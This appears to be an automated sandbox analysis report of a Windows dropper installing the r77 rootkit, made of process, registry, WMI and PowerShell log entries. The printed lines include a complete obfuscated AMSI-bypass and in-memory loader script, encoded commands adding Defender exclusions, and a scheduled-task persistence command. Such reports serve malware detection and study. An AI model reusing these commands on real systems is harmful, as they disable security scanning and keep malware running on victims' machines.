Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Jump to behavior
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Source: C:\Users\user\Desktop\Install.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	1_2_0040352D
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx,	39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E010 AdjustTokenPrivileges,	39_2_000000014000E010

Source: C:\Users\user\AppData\Roaming\34432.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Install.exe

File created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_0040498A

Source: C:\Users\user\AppData\Roaming\34432.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01

Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Roaming\34432.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Install.exe

Static file information: File size 4713759 > 1048576

Source: Install.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source:	Binary string: x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
